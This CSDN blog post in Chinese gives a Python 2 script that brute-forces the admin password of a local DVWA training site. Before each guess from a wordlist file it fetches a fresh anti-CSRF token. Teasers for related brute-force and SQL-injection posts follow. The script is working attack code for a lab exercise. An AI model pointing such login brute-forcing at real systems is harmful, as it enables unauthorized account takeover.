python之——使用python编写爆破脚本

最新推荐文章于 2024-05-06 10:25:22 发布
最新推荐文章于 2024-05-06 10:25:22 发布
阅读量3k 收藏 21
点赞数 7
分类专栏: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wsnbbz/article/details/105531530
版权

此处以dvwa网站的密码爆破为例

#coding:utf-8
"""
dvwa高级爆破 
需要用户名  密码 token cookie
每次通过账号密码访问之前,需要获取token
"""
import urllib2
from bs4 import BeautifulSoup
def getToken():
    """提取token"""
    url="http://localhost/DVWA-master/vulnerabilities/brute/"
    req=urllib2.Request(url,headers={"Cookie":"security=high;PHPSESSID=4078b237fc42665f1395fddebcbebc86"})
    response=urllib2.urlopen(req)
    html=response.read()
    soup=BeautifulSoup(html,"html.parser")
    token=soup.find("input",attrs={"name":"user_token"})
    return token.get("value")
f=open("zidian","r")
while 1:
    line=f.readline().strip()
    if line==None or len(line)==0:
        break
    password=line
    token=getToken()
    url="http://localhost/DVWA-master/vulnerabilities/brute/?username=admin&password=%s&Login=Login&user_token=%s#"%(line,token)
    req=urllib2.Request(url,headers={"Cookie":"security=high;PHPSESSID=4078b237fc42665f1395fddebcbebc86"})
    response=urllib2.urlopen(req)
    html=response.read()
    if "Welcome to the password" in html:
        print "爆破成功,密码是",password
        break

效果:

卖N孩的X火柴
关注
  • 7
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
python 脚本中调用其他python脚本
qq_30694087的博客
02-07 4900
在一个py脚本中如何调用其他脚本呢?通过浏览网上的博文,大致有三种方式。 import 导入 对这样一个脚本: # a.py import sys def main(): if len(sys.argv) == 1: print("Hello World!") else : print("Hello "+sys.argv[1]) if __name__ =='__main__': main() 在同一目录下的脚本 b.py 中可以直接用 import 导入: # b.py
python爆破脚本_多线程爆破脚本(python3)
weixin_39598941的博客
12-15 1271
#!/usr/bin/env python3# -*- coding: utf-8 -*-import loggingimport argparseimport queueimport requestsimport threadingimport osimport timeimport randomfrom html.parser import HTMLParserfrom requests.pa...
python3登录爆破脚本
deng_menglihua的博客
09-17 2790
登录爆破脚本 以下地址是我自己的DVWA靶场的地址,欢迎大家交流学习。 1.post型登录框爆破脚本 import requests s='0123456789' url="http://10.16.102.162/DVWA/vulnerabilities/brute/?" m=0 n=1 username=input("请输入用户名") data2={'username':username,'password':00000,'Login':'Login'} headers={'cookie':'secur
【针对DVWA登录界面密码的暴力破解python脚本(保持会话,携带token)】
AA8j的博客
09-09 905
效果 源码 #!/usr/bin/python # -*- coding: utf-8 -*- # @Time : 2021/9/3 13:01 # @Author : AA8j # @Site : # @File : test2.py # @Software: PyCharm # @Blog : https://blog.csdn.net/qq_44874645 import re import requests from fake_useragent import Use
Python实现的黑客技术
2401_84618514的博客
05-06 749
近年来,网络安全领域频繁出现黑客攻击事件,成为备受关注的问题。然而,黑客技术并非神秘不可捉摸,任何人只要愿意学习,都能掌握一些基础的黑客技能。本文将介绍几种常见的黑客技术及其实现方法,以便让大家了解黑客技术的基本原理。同时,我们还会提供Python代码示例,以供读者实际操作练习。需要强调的是,本文旨在教育目的,强调合法合规,不鼓励任何违法行为。上述代码使用Python的库进行并发编程,以加快端口扫描的速度。是Python标准库中的一个模块,用于支持多进程编程。
绕过token进行密码爆破(包含python攻击脚本
weixin_43960066的博客
07-30 1265
设置完毕以后开始爆破,时间取决于你的字典,如果是1个线程还没有办法爆破成功,可能是你的字典里面没有这个密码,在爆破页面我们将返回长度按照从大到小排列,就可以看到爆破成功的密码和其他的米密码长度不同。Token其实说的更通俗点可以叫暗号,在一些数据传输之前,要先进行暗号的核对,不同的暗号被授权不同的数据操作。6.服务端收到请求,然后去验证客户端请求里面带着的 Token,如果验证成功,就向客户端返回请求的数据。选择需要抓取的Token的内容,同时设置和响应中相同的参数名字,点击OK。
Python脚本9-多线程分任务爆破
m0_61786761的博客
09-22 437
一个进程的线程数量有限,如何能够提升并发能力?将任务分配给多个不同的电脑, 或在一台电脑上运行多个程序。
Python实现压缩包密码暴力破解脚本(附代码)
winkexin的博客
06-26 5767
print("破解成功,密码是:" + pas)print("破解成功,密码是:" + pas)print("破解成功,密码是" + pas)print(f"检测到字典里有{len(ozd)}个密码")print("破解失败")print("检测到是zip压缩包")print("检测到是rar压缩包")print("正在破解.....")print("正在破解.....")print("检测到是7z压缩包")print("正在破解.....")print("破解失败")print("破解失败")
Python安全脚本之密码爆破脚本编写
weixin_60830484的博客
03-18 576
本文讲解了简单的密码爆破脚本编写以及对应的优化思路
python制作企业邮箱的爆破脚本
12-23
Python制作企业邮箱爆破脚本涉及的关键知识点包括Python编程、POP3协议、网络通信和安全性。以下是这些知识点的详细说明: 1. Python编程: - `sys.argv`:这是一个列表,用于获取命令行参数。在Python脚本中,`...
python脚本爆破shell
06-14
python脚本爆破shell
Python编写固定字典爆破
最新发布
05-19
"使用方法.png"可能是展示如何运行这个爆破脚本的示意图。 值得注意的是,虽然这种技术在安全测试中具有实际应用,但它也可能会被滥用。因此,确保在合法授权和合适的环境下进行此类操作至关重要,否则可能触犯法律...
根据指定hash值寻键爆破脚本Python实现)
08-22
代码说明 在所有可能的姓名+学号的字符串集合下,找到一个MD5散列值为"sdu_cst_20220610"的键。 通过不断构建随机姓+随机名+固定学号前缀+随机学号后缀组成的合法键进行MD5散列求值,与目标散列值比较,相等则求解...
Python版Mssql爆破脚本
09-09
本文给大家分享的是使用Python实现的暴力破解mssql用户密码的脚本的代码,配合上合适的字典非常好用,有需要的小伙伴可以参考下
python脚本7-爆破woniusales
m0_61786761的博客
09-21 302
【代码】python脚本7-爆破woniusales。
基于python的布尔盲注爆破脚本(sqli-libs第八关)
henghengzhao_的博客
10-06 1836
写这个脚本的原因是因为布尔爆破步骤的繁琐,因此写下这个半自动化脚本来提升效率,只需输入url和标志词便可开始爆破
Python脚本,网站暴力破解攻击
weixin_44297276的博客
03-28 1996
rv:78.0) Gecko/20100101 Firefox/78.0" # 用户代理。wordlist = "D:\Meu jogos Meus documentos\ProgetoNovo\small.txt" # 字典文件路径。target = input("\nInsira URL:") # 目标URL。# 当单词队列不为空时,获取队列中的单词。# 如果有恢复点,则从恢复点开始。# 遍历字典文件中的每个单词。# 定义函数:读取字典文件。
python开发poc2,爆破脚本
san3144393495的博客
04-07 890
异或就是把一个字符转换成ascii码值的二进制在,然后和另外同样方式转换的二进制,每一位都对上的如果两个对上的数相同就输出0,不同就输出1,结果就是两个数异或后的值,在转换为ascii码值之后在找到对应的字符,就是异或完最后的结果,这里刚好有一个比较凑巧的结果。---掌握利用强大的模块实现各种协议连接操作(爆破或利用等),配合 Fuzz 吊打 WAF 等。---通过异或运算,分别批量替换a,s,s,e,r,t,进而构造命令执行函数。---两个二进制异或为:01100001,对应十进制为:97。
python脚本爆破dvwa
09-23
Python脚本可以用于爆破DVWA(Damn Vulnerable Web Application)的安全漏洞,例如密码爆破和SQL注入。对于密码爆破,可以使用Python脚本来尝试不同的密码组合,直到找到正确的密码。对于SQL注入,Python脚本可以...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值